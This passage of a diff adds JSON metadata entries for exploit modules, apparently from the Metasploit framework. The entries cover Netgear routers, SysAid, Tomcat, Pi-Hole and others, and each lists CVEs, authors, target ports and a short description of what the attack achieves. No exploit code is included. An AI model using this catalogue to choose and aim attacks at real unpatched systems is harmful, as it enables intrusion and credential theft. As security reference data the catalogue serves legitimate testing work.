+ "ref_name": "admin/http/netgear_r6700_pass_reset", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "config-changes" + ], + "Stability": [ + "crash-service-down" + ], + "Reliability": [], + "RelatedModules": [ + "exploit/linux/telnet/netgear_telnetenable" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/netgear_r7000_backup_cgi_heap_overflow_rce": { + "name": "Netgear R7000 backup.cgi Heap Overflow RCE", + "fullname": "auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-04-21", + "type": "auxiliary", + "author": [ + "colorlight2019", + "SSD Disclosure", + "Grant Willcox (tekwizz123)" + ], + "description": "This module exploits a heap buffer overflow in the genie.cgi?backup.cgi\n page of Netgear R7000 routers running firmware version 1.0.11.116.\n Successful exploitation results in unauthenticated attackers gaining\n code execution as the root user.\n\n The exploit utilizes these privileges to enable the telnet server\n which allows attackers to connect to the target and execute commands\n as the admin user from within a BusyBox shell. 
Users can connect to\n this telnet server by running the command \"telnet *target IP*\".", + "references": [ + "URL-https://ssd-disclosure.com/ssd-advisory-netgear-nighthawk-r7000-httpd-preauth-rce/", + "CVE-2021-31802" + ], + "platform": "Linux", + "arch": "armle", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce.rb", + "is_install_path": true, + "ref_name": "admin/http/netgear_r7000_backup_cgi_heap_overflow_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "config-changes" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/netgear_soap_password_extractor": { + "name": "Netgear Unauthenticated SOAP Password Extractor", + "fullname": "auxiliary/admin/http/netgear_soap_password_extractor", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-02-11", + "type": "auxiliary", + "author": [ + "Peter Adkins ", + "Michael Messner ", + "h00die " + ], + "description": "This module exploits an authentication bypass vulnerability in different Netgear devices.\n It allows to extract the password for the remote management interface. 
This module has been\n tested on a Netgear WNDR3700v4 - V1.0.1.42, but other devices are reported as vulnerable:\n NetGear WNDR3700v4 - V1.0.0.4SH, NetGear WNDR3700v4 - V1.0.1.52, NetGear WNR2200 - V1.0.1.88,\n NetGear WNR2500 - V1.0.0.24, NetGear WNDR3700v2 - V1.0.1.14 (Tested by Paula Thomas),\n NetGear WNDR3700v1 - V1.0.16.98 (Tested by Michal Bartoszkiewicz),\n NetGear WNDR3700v1 - V1.0.7.98 (Tested by Michal Bartoszkiewicz),\n NetGear WNDR4300 - V1.0.1.60 (Tested by Ronny Lindner),\n NetGear R6300v2 - V1.0.3.8 (Tested by Robert Mueller),\n NetGear WNDR3300 - V1.0.45 (Tested by Robert Mueller),\n NetGear WNDR3800 - V1.0.0.48 (Tested by an Anonymous contributor),\n NetGear WNR1000v2 - V1.0.1.1 (Tested by Jimi Sebree),\n NetGear WNR1000v2 - V1.1.2.58 (Tested by Chris Boulton),\n NetGear WNR2000v3 - v1.1.2.10 (Tested by h00die)", + "references": [ + "BID-72640", + "OSVDB-118316", + "URL-https://github.com/darkarnium/secpub/tree/master/Vulnerabilities/NetGear/SOAPWNDR" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb", + "is_install_path": true, + "ref_name": "admin/http/netgear_soap_password_extractor", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/netgear_wnr2000_pass_recovery": { + "name": "NETGEAR WNR2000v5 Administrator Password Recovery", + "fullname": "auxiliary/admin/http/netgear_wnr2000_pass_recovery", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-12-20", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "The NETGEAR WNR2000 router has a vulnerability in the way it handles password recovery.\n 
This vulnerability can be exploited by an unauthenticated attacker who is able to guess\n the value of a certain timestamp which is in the configuration of the router.\n Brute forcing the timestamp token might take a few minutes, a few hours, or days, but\n it is guaranteed that it can be bruteforced.\n This module works very reliably and it has been tested with the WNR2000v5, firmware versions\n 1.0.0.34 and 1.0.0.18. It should also work with the hardware revisions v4 and v3, but this\n has not been tested.", + "references": [ + "CVE-2016-10175", + "CVE-2016-10176", + "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt", + "URL-https://seclists.org/fulldisclosure/2016/Dec/72", + "URL-https://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/netgear_wnr2000_pass_recovery.rb", + "is_install_path": true, + "ref_name": "admin/http/netgear_wnr2000_pass_recovery", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/nexpose_xxe_file_read": { + "name": "Nexpose XXE Arbitrary File Read", + "fullname": "auxiliary/admin/http/nexpose_xxe_file_read", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Brandon Perry ", + "Drazen Popovic ", + "Bojan Zdrnja " + ], + "description": "Nexpose v5.7.2 and prior is vulnerable to a XML External Entity attack via a number\n of vectors. This vulnerability can allow an attacker to a craft special XML that\n could read arbitrary files from the filesystem. 
This module exploits the\n vulnerability via the XML API.", + "references": [ + "URL-http://web.archive.org/web/20230402081629/https://www.rapid7.com/blog/post/2013/08/16/r7-vuln-2013-07-24/" + ], + "platform": "", + "arch": "", + "rport": 3780, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb", + "is_install_path": true, + "ref_name": "admin/http/nexpose_xxe_file_read", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/novell_file_reporter_filedelete": { + "name": "Novell File Reporter Agent Arbitrary File Delete", + "fullname": "auxiliary/admin/http/novell_file_reporter_filedelete", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Luigi Auriemma", + "juan vazquez " + ], + "description": "NFRAgent.exe in Novell File Reporter allows remote attackers to delete\n arbitrary files via a full pathname in an SRS request with OPERATION set to 4 and\n CMD set to 5 against /FSF/CMD. 
This module has been tested successfully on NFR\n Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1) on\n Windows platforms.", + "references": [ + "CVE-2011-2750", + "OSVDB-73729", + "URL-http://aluigi.org/adv/nfr_2-adv.txt" + ], + "platform": "", + "arch": "", + "rport": 3037, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb", + "is_install_path": true, + "ref_name": "admin/http/novell_file_reporter_filedelete", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/nuuo_nvrmini_reset": { + "name": "NUUO NVRmini 2 / NETGEAR ReadyNAS Surveillance Default Configuration Load and Administrator Password Reset", + "fullname": "auxiliary/admin/http/nuuo_nvrmini_reset", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-08-04", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "The NVRmini 2 Network Video Recorded and the ReadyNAS Surveillance application are vulnerable\n to an administrator password reset on the exposed web management interface.\n Note that this only works for unauthenticated attackers in earlier versions of the Nuuo firmware\n (before v1.7.6), otherwise you need an administrative user password.\n This exploit has been tested on several versions of the NVRmini 2 and the ReadyNAS Surveillance.\n It probably also works on the NVRsolo and other Nuuo devices, but it has not been tested\n in those devices.", + "references": [ + "CVE-2016-5676", + "US-CERT-VU-856152", + "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-nvr-vulns.txt", + "URL-https://seclists.org/bugtraq/2016/Aug/45" + ], + "platform": "", + 
"arch": "", + "rport": 8081, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/nuuo_nvrmini_reset.rb", + "is_install_path": true, + "ref_name": "admin/http/nuuo_nvrmini_reset", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/openbravo_xxe": { + "name": "Openbravo ERP XXE Arbitrary File Read", + "fullname": "auxiliary/admin/http/openbravo_xxe", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-10-30", + "type": "auxiliary", + "author": [ + "Brandon Perry " + ], + "description": "The Openbravo ERP XML API expands external entities which can be defined as\n local files. This allows the user to read any files from the FS as the\n user Openbravo is running as (generally not root).\n\n This module was tested against Openbravo ERP version 3.0MP25 and 2.50MP6.", + "references": [ + "CVE-2013-3617", + "OSVDB-99141", + "BID-63431", + "URL-https://www.rapid7.com/blog/post/2013/10/30/seven-tricks-and-treats" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/openbravo_xxe.rb", + "is_install_path": true, + "ref_name": "admin/http/openbravo_xxe", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/pfadmin_set_protected_alias": { + "name": "Postfixadmin Protected Alias Deletion Vulnerability", + "fullname": "auxiliary/admin/http/pfadmin_set_protected_alias", + 
"aliases": [], + "rank": 300, + "disclosure_date": "2017-02-03", + "type": "auxiliary", + "author": [ + "Jan-Frederik Rieckers" + ], + "description": "Postfixadmin installations between 2.91 and 3.0.1 do not check if an\n admin is allowed to delete protected aliases. This vulnerability can be\n used to redirect protected aliases to an other mail address. Eg. rewrite\n the postmaster@domain alias", + "references": [ + "CVE-2017-5930", + "URL-https://github.com/postfixadmin/postfixadmin/pull/23", + "BID-96142" + ], + "platform": "PHP", + "arch": "php", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/http/pfadmin_set_protected_alias.rb", + "is_install_path": true, + "ref_name": "admin/http/pfadmin_set_protected_alias", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/pihole_domains_api_exec": { + "name": "Pi-Hole Top Domains API Authenticated Exec", + "fullname": "auxiliary/admin/http/pihole_domains_api_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-08-04", + "type": "auxiliary", + "author": [ + "h00die", + "SchneiderSec" + ], + "description": "This exploits a command execution in Pi-Hole Web Interface <= 5.5.\n The Settings > API/Web inetrace page contains the field\n Top Domains/Top Advertisers which is validated by a regex which does not properly\n filter system commands, which can then be executed by calling the gravity\n functionality. 
However, the regex only allows a-z, 0-9, _.", + "references": [ + "URL-https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-5cm9-6p3m-v259", + "CVE-2021-32706" + ], + "platform": "PHP", + "arch": "php", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-10-03 19:50:04 +0000", + "path": "/modules/auxiliary/admin/http/pihole_domains_api_exec.rb", + "is_install_path": true, + "ref_name": "admin/http/pihole_domains_api_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs", + "config-changes", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/rails_devise_pass_reset": { + "name": "Ruby on Rails Devise Authentication Password Reset", + "fullname": "auxiliary/admin/http/rails_devise_pass_reset", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-01-28", + "type": "auxiliary", + "author": [ + "joernchen", + "jjarmoc" + ], + "description": "The Devise authentication gem for Ruby on Rails is vulnerable\n to a password reset exploit leveraging type confusion. By submitting XML\n to rails, we can influence the type used for the reset_password_token\n parameter. This allows for resetting passwords of arbitrary accounts,\n knowing only the associated email address.\n\n This module defaults to the most common devise URIs and response values,\n but these may require adjustment for implementations which customize them.\n\n Affects Devise < v2.2.3, 2.1.3, 2.0.5 and 1.5.4 when backed by any database\n except PostgreSQL or SQLite3. Tested with v2.2.2, 2.1.2, and 2.0.4 on Rails\n 3.2.11. 
Patch applied to Rails 3.2.12 and 3.1.11 should prevent exploitation\n of this vulnerability, by quoting numeric values when comparing them with\n non numeric values.", + "references": [ + "CVE-2013-0233", + "OSVDB-89642", + "BID-57577", + "URL-http://blog.plataformatec.com.br/2013/01/security-announcement-devise-v2-2-3-v2-1-3-v2-0-5-and-v1-5-3-released/", + "URL-http://www.phenoelit.org/blog/archives/2013/02/05/mysql_madness_and_rails/index.html", + "URL-https://github.com/rails/rails/commit/921a296a3390192a71abeec6d9a035cc6d1865c8", + "URL-https://github.com/rails/rails/commit/26e13c3ca71cbc7859cc4c51e64f3981865985d8" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/rails_devise_pass_reset.rb", + "is_install_path": true, + "ref_name": "admin/http/rails_devise_pass_reset", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/scadabr_credential_dump": { + "name": "ScadaBR Credentials Dumper", + "fullname": "auxiliary/admin/http/scadabr_credential_dump", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-05-28", + "type": "auxiliary", + "author": [ + "bcoles " + ], + "description": "This module retrieves credentials from ScadaBR, including\n service credentials and unsalted SHA1 password hashes for\n all users, by invoking the `EmportDwr.createExportData` DWR\n method of Mango M2M which is exposed to all authenticated\n users regardless of privilege level.\n\n This module has been tested successfully with ScadaBR\n versions 1.0 CE and 0.9 on Windows and Ubuntu systems.", + "references": [], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 
443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2021-02-22 15:51:02 +0000", + "path": "/modules/auxiliary/admin/http/scadabr_credential_dump.rb", + "is_install_path": true, + "ref_name": "admin/http/scadabr_credential_dump", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/scrutinizer_add_user": { + "name": "Plixer Scrutinizer NetFlow and sFlow Analyzer HTTP Authentication Bypass", + "fullname": "auxiliary/admin/http/scrutinizer_add_user", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-07-27", + "type": "auxiliary", + "author": [ + "MC ", + "Jonathan Claudius", + "Tanya Secker", + "sinn3r " + ], + "description": "This will add an administrative account to Scrutinizer NetFlow and sFlow Analyzer\n without any authentication. Versions such as 9.0.1 or older are affected.", + "references": [ + "CVE-2012-2626", + "OSVDB-84318", + "URL-http://web.archive.org/web/20130827051639/https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/http/scrutinizer_add_user.rb", + "is_install_path": true, + "ref_name": "admin/http/scrutinizer_add_user", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/sophos_wpa_traversal": { + "name": "Sophos Web Protection Appliance patience.cgi Directory Traversal", + "fullname": "auxiliary/admin/http/sophos_wpa_traversal", + "aliases": [], + "rank": 300, + "disclosure_date": 
"2013-04-03", + "type": "auxiliary", + "author": [ + "Wolfgang Ettlingers", + "juan vazquez " + ], + "description": "This module abuses a directory traversal in Sophos Web Protection Appliance, specifically\n on the /cgi-bin/patience.cgi component. This module has been tested successfully on the\n Sophos Web Virtual Appliance v3.7.0.", + "references": [ + "CVE-2013-2641", + "OSVDB-91953", + "BID-58833", + "EDB-24932", + "URL-https://web.archive.org/web/20130603041204/http://www.sophos.com/en-us/support/knowledgebase/118969.aspx", + "URL-https://web.archive.org/web/20140701204340/https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130403-0_Sophos_Web_Protection_Appliance_Multiple_Vulnerabilities.txt" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/sophos_wpa_traversal.rb", + "is_install_path": true, + "ref_name": "admin/http/sophos_wpa_traversal", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/supra_smart_cloud_tv_rfi": { + "name": "Supra Smart Cloud TV Remote File Inclusion", + "fullname": "auxiliary/admin/http/supra_smart_cloud_tv_rfi", + "aliases": [], + "rank": 300, + "disclosure_date": "2019-06-03", + "type": "auxiliary", + "author": [ + "Dhiraj Mishra", + "wvu " + ], + "description": "This module exploits an unauthenticated remote file inclusion which\n exists in Supra Smart Cloud TV. The media control for the device doesn't\n have any session management or authentication. 
Leveraging this, an\n attacker on the local network can send a crafted request to broadcast a\n fake video.", + "references": [ + "CVE-2019-12477", + "URL-https://www.inputzero.io/2019/06/hacking-smart-tv.html" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.rb", + "is_install_path": true, + "ref_name": "admin/http/supra_smart_cloud_tv_rfi", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/sysaid_admin_acct": { + "name": "SysAid Help Desk Administrator Account Creation", + "fullname": "auxiliary/admin/http/sysaid_admin_acct", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-06-03", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated\n user to create an administrator account. Note that this exploit will only work once. Any\n subsequent attempts will fail. On the other hand, the credentials must be verified\n manually. 
This module has been tested on SysAid 14.4 in Windows and Linux.", + "references": [ + "CVE-2015-2993", + "URL-https://seclists.org/fulldisclosure/2015/Jun/8", + "URL-https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/sysaid_admin_acct.rb", + "is_install_path": true, + "ref_name": "admin/http/sysaid_admin_acct", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/sysaid_file_download": { + "name": "SysAid Help Desk Arbitrary File Download", + "fullname": "auxiliary/admin/http/sysaid_file_download", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-06-03", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module exploits two vulnerabilities in SysAid Help Desk that allows\n an unauthenticated user to download arbitrary files from the system. First, an\n information disclosure vulnerability (CVE-2015-2997) is used to obtain the file\n system path, and then we abuse a directory traversal (CVE-2015-2996) to download\n the file. 
Note that there are some limitations on Windows, in that the information\n disclosure vulnerability doesn't work on a Windows platform, and we can only\n traverse the current drive (if you enter C:\\afile.txt and the server is running\n on D:\\ the file will not be downloaded).\n\n This module has been tested with SysAid 14.4 on Windows and Linux.", + "references": [ + "CVE-2015-2996", + "CVE-2015-2997", + "URL-https://seclists.org/fulldisclosure/2015/Jun/8", + "URL-https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/sysaid_file_download.rb", + "is_install_path": true, + "ref_name": "admin/http/sysaid_file_download", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/sysaid_sql_creds": { + "name": "SysAid Help Desk Database Credentials Disclosure", + "fullname": "auxiliary/admin/http/sysaid_sql_creds", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-06-03", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated\n user to download arbitrary files from the system. This is used to download the server\n configuration file that contains the database username and password, which is encrypted\n with a fixed, known key. 
This module has been tested with SysAid 14.4 on Windows and Linux.", + "references": [ + "CVE-2015-2996", + "CVE-2015-2998", + "URL-https://seclists.org/fulldisclosure/2015/Jun/8", + "URL-https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/sysaid_sql_creds.rb", + "is_install_path": true, + "ref_name": "admin/http/sysaid_sql_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/telpho10_credential_dump": { + "name": "Telpho10 Backup Credentials Dumper", + "fullname": "auxiliary/admin/http/telpho10_credential_dump", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-09-02", + "type": "auxiliary", + "author": [ + "Jan Rude" + ], + "description": "This module exploits a vulnerability present in all versions of Telpho10 telephone system\n appliance. 
This module generates a configuration backup of Telpho10,\n downloads the file and dumps the credentials for admin login,\n phpmyadmin, phpldapadmin, etc.\n This module has been successfully tested on the appliance versions 2.6.31 and 2.6.39.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/telpho10_credential_dump.rb", + "is_install_path": true, + "ref_name": "admin/http/telpho10_credential_dump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/tomcat_administration": { + "name": "Tomcat Administration Tool Default Access", + "fullname": "auxiliary/admin/http/tomcat_administration", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Matteo Cantoni " + ], + "description": "Detect the Tomcat administration interface. 
The administration interface is included in versions 5.5 and lower.\n Port 8180 is the default for FreeBSD, 8080 for all others.", + "references": [ + "URL-http://tomcat.apache.org/" + ], + "platform": "", + "arch": "", + "rport": 8180, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/tomcat_administration.rb", + "is_install_path": true, + "ref_name": "admin/http/tomcat_administration", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/tomcat_ghostcat": { + "name": "Apache Tomcat AJP File Read", + "fullname": "auxiliary/admin/http/tomcat_ghostcat", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-02-20", + "type": "auxiliary", + "author": [ + "A Security Researcher of Chaitin Tech", + "SunCSR Team" + ], + "description": "When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache\n Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection.\n If such connections are available to an attacker, they can be exploited in ways that may be surprising.\n\n In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP\n Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended\n in the security guide) that this Connector would be disabled if not required. This vulnerability report\n identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application -\n processing any file in the web application as a JSP. 
Further, if the web application allowed file upload\n and stored those files within the web application (or the attacker was able to control the content of the\n web application by some other means) then this, along with the ability to process a file as a JSP, made\n remote code execution possible.\n\n It is important to note that mitigation is only required if an AJP port is accessible to untrusted users.\n Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files\n and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were\n made to the default AJP Connector configuration in 9.0.31 to harden the default configuration.\n It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes\n to their configurations.", + "references": [ + "CVE-2020-1938", + "EDB-48143", + "URL-http://web.archive.org/web/20250114042903/https://www.chaitin.cn/en/ghostcat" + ], + "platform": "", + "arch": "", + "rport": 8009, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/http/tomcat_ghostcat.rb", + "is_install_path": true, + "ref_name": "admin/http/tomcat_ghostcat", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "Ghostcat" + ], + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/tomcat_utf8_traversal": { + "name": "Tomcat UTF-8 Directory Traversal Vulnerability", + "fullname": "auxiliary/admin/http/tomcat_utf8_traversal", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-01-09", + "type": "auxiliary", + "author": [ + "aushack ", + "guerrino di massa" + ], + "description": "This module tests whether a directory traversal vulnerability is present\n in versions of 
